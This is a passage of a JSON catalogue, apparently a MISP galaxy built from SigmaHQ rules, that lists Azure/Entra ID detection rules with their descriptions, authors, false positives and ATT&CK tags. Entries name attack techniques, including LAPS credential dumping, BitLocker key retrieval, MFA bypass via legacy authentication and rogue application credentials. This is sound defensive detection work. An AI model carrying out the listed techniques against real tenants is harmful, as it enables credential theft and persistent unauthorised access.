established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#things-to-monitor", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_invite_failure.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", "value": "Guest User Invited By Non Approved Inviters" }, { "description": "Detects when a temporary access pass (TAP) is added to an account. TAPs added to priv accounts should be investigated", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-10", "falsepositive": [ "Administrator adding a legitimate temporary access pass" ], "filename": "azure_tap_added.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#changes-to-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_tap_added.yml" ], "tags": [ "attack.persistence", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", "value": "Temporary Access Pass Added To An Account" }, { "description": "Detect when a user has reset their password in Azure AD", "meta": { "author": "YochanaHenderson, '@Yochana-H'", "creation_date": "2022-08-03", "falsepositive": [ "If this was approved by System Administrator or confirmed user action." ], "filename": "azure_user_password_change.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_user_password_change.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", "value": "Password Reset By User Account" }, { "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-05-26", "falsepositive": [ "When credentials are added/removed as part of the normal working hours/workflows" ], "filename": "azure_app_credential_added.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_credential_added.yml" ], "tags": [ "attack.t1098.001", "attack.persistence" ] }, "related": [ { "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", "value": "Added Credentials to Existing Application" }, { "description": "Detects when changes are made to PIM roles", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-09", "falsepositive": [ "Legit administrative PIM setting configuration changes" ], "filename": "azure_pim_change_settings.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_change_settings.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", "value": "Changes To PIM Settings" }, { "description": "Detects when a configuration change is made to an applications URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-02", "falsepositive": [ "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." ], "filename": "azure_app_uri_modifications.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_uri_modifications.yml" ], "tags": [ "attack.t1528", "attack.t1078.004", "attack.persistence", "attack.credential-access", "attack.privilege-escalation" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", "value": "Application URI Configuration Changes" }, { "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", "meta": { "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", "creation_date": "2022-08-04", "falsepositive": [ "User removed from the group is approved" ], "filename": "azure_group_user_addition_ca_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_group_user_addition_ca_modification.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", "value": "User Added To Group With CA Policy Modification Access" }, { "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-02", "falsepositive": [ "When a new application owner is added by an administrator" ], "filename": "azure_app_owner_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#new-owner", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_owner_added.yml" ], "tags": [ "attack.t1552", "attack.credential-access" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", "value": "Added Owner To Application" }, { "description": "Detects changes and updates to the user risk and MFA registration policy.\nAttackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.\n", "meta": { "author": "Harjot Singh (@cyb3rjy0t)", "creation_date": "2024-08-13", "falsepositive": [ "Known updates by administrators." ], "filename": "azure_update_risk_and_mfa_registration_policy.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/identity/monitoring-health/reference-audit-activities", "https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "d4c7758e-9417-4f2e-9109-6125d66dabef", "value": "User Risk and MFA Registration Policy Updated" }, { "description": "Detects newly added root certificate authority to an AzureAD tenant to support certificate based authentication.", "meta": { "author": "Harjot Shah Singh, '@cyb3rjy0t'", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "azure_ad_new_root_ca_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f", "https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_new_root_ca_added.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4bb80281-3756-4ec8-a88e-523c5a6fda9e", "value": "New Root Certificate Authority Added" }, { "description": "Detects when an account dumps the LAPS password from Entra ID.", "meta": { "author": "andrewdanis", "creation_date": "2024-06-26", "falsepositive": [ "Approved activity performed by an Administrator." ], "filename": "azure_auditlogs_laps_credential_dumping.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487", "https://twitter.com/NathanMcNulty/status/1785051227568632263", "https://www.cloudcoffee.ch/microsoft-365/configure-windows-laps-in-microsoft-intune/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_auditlogs_laps_credential_dumping.yml" ], "tags": [ "attack.t1098.005" ] }, "related": [ { "dest-uuid": "7decb26c-715c-40cf-b7e0-026f7d7cc215", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a4b25073-8947-489c-a8dd-93b41c23f26d", "value": "Windows LAPS Credential Dump From Entra ID" }, { "description": "Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner.", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-19", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_role_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#service-principal-assigned-to-a-role", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_role_added.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", "value": "App Role Added" }, { "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-28", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_delegated_permissions_all_users.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_delegated_permissions_all_users.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", "value": "Delegated Permissions Granted For All Users" }, { "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-09", "falsepositive": [ "Actual admin using PIM." ], "filename": "azure_pim_activation_approve_deny.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_activation_approve_deny.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", "value": "PIM Approvals And Deny Elevation" }, { "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-28", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_privileged_permissions.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_privileged_permissions.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", "value": "App Granted Privileged Delegated Or App Permissions" }, { "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-06-30", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_guest_to_member.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_guest_to_member.yml" ], "tags": [ "attack.privilege-escalation", "attack.initial-access", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", "value": "User State Changed From Guest To Member" }, { "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", "meta": { "author": "Corissa Koopmans, '@corissalea'", "creation_date": "2022-07-19", "falsepositive": [ "Misconfigured role permissions", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." ], "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", "value": "CA Policy Updated by Non Approved Actor" }, { "description": "Detects when PIM alerts are set to disabled.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-09", "falsepositive": [ "Administrator disabling PIM alerts as an active choice." ], "filename": "azure_pim_alerts_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_pim_alerts_disabled.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", "value": "PIM Alert Setting Changes To Disabled" }, { "description": "Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.", "meta": { "author": "AlertIQ", "creation_date": "2021-10-10", "falsepositive": [ "Unknown" ], "filename": "azure_change_to_authentication_method.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_change_to_authentication_method.yml" ], "tags": [ "attack.credential-access", "attack.t1556", "attack.persistence", "attack.defense-evasion", "attack.t1098" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", "value": "Change to Authentication Method" }, { "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-26", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_subscription_permissions_elevation_via_auditlogs.yml" ], "tags": [ "attack.initial-access", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", "value": "Azure Subscription Permission Elevation Via AuditLogs" }, { "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", "meta": { "author": "Corissa Koopmans, '@corissalea'", "creation_date": "2022-07-19", "falsepositive": [ "Misconfigured role permissions", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." ], "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure#conditional-access", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_aad_secops_ca_policy_removedby_bad_actor.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1548", "attack.t1556" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", "value": "CA Policy Removed by Non Approved Actor" }, { "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-10", "falsepositive": [ "When the permission is legitimately needed for the app" ], "filename": "azure_app_permissions_msft.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_permissions_msft.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", "value": "App Granted Microsoft Permissions" }, { "description": "Detects when a configuration change is made to an applications AppID URI.", "meta": { "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", "creation_date": "2022-06-02", "falsepositive": [ "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." ], "filename": "azure_app_appid_uri_changes.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml" ], "tags": [ "attack.persistence", "attack.credential-access", "attack.privilege-escalation", "attack.t1552", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", "value": "Application AppID Uri Configuration Changes" }, { "description": "Detects when end user consent is blocked due to risk-based consent.", "meta": { "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", "creation_date": "2022-07-10", "falsepositive": [ "Unknown" ], "filename": "azure_app_end_user_consent_blocked.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#end-user-stopped-due-to-risk-based-consent", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_app_end_user_consent_blocked.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7091372f-623c-4293-bc37-20c32b3492be", "value": "End User Consent Blocked" }, { "description": "Detects when an account was created and deleted in a short period of time.", "meta": { "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", "creation_date": "2022-08-11", "falsepositive": [ "Legit administrative action" ], "filename": "azure_ad_account_created_deleted.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#short-lived-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_account_created_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", "value": "Account Created And Deleted Within A Close Time Frame" }, { "description": "Monitor and alert for Bitlocker key retrieval.", "meta": { "author": "Michael Epping, '@mepples21'", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "azure_ad_bitlocker_key_retrieval.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_bitlocker_key_retrieval.yml" ], "tags": [ "attack.defense-evasion", "attack.t1078.004" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0413867-daf3-43dd-9245-734b3a787942", "value": "Bitlocker Key Retrieval" }, { "description": "Detects when certificate based authentication has been enabled in an Azure Active Directory tenant.", "meta": { "author": "Harjot Shah Singh, '@cyb3rjy0t'", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "azure_ad_certificate_based_authencation_enabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://posts.specterops.io/passwordless-persistence-and-privilege-escalation-in-azure-98a01310be3f", "https://goodworkaround.com/2022/02/15/digging-into-azure-ad-certificate-based-authentication/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_ad_certificate_based_authencation_enabled.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c2496b41-16a9-4016-a776-b23f8910dc58", "value": "Certificate-Based Authentication Enabled" }, { "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", "meta": { "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", "creation_date": "2022-08-05", "falsepositive": [ "Legtimate administrator actions of removing members from a role" ], "filename": "azure_priviledged_role_assignment_bulk_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-identity-management#azure-ad-roles-assignment", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_bulk_change.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", "value": "Bulk Deletion Changes To Privileged Account Permissions" }, { "description": "Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.", "meta": { "author": "Harjot Singh, '@cyb3rjy0t'", "creation_date": "2023-03-20", "falsepositive": [ "Known Legacy Accounts" ], "filename": "azure_ad_suspicious_signin_bypassing_mfa.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022", "https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc", "value": "Potential MFA Bypass Using Legacy Client Authentication" }, { "description": "Detect when users are authenticating without MFA being required.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-27", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_ad_only_single_factor_auth_required.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1556.006" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b4409cd8-0da9-46e1-a401-a241afd4d1cc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", "value": "Azure AD Only Single Factor Authentication Required" }, { "description": "Detect successful authentications from countries you do not operate out of.", "meta": { "author": "MikeDuddington, '@dudders1'", "creation_date": "2022-07-28", "falsepositive": [ "If this was approved by System Administrator." ], "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "azure", "refs": [ "https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", "value": "Successful Authentications From Countries You Do Not Operate Out Of" }, { "description": "Detects when successful sign-ins increased by 10% or greater.", "meta": { "author": "Mark Morowczynski '@markmorow', MikeDuddington, 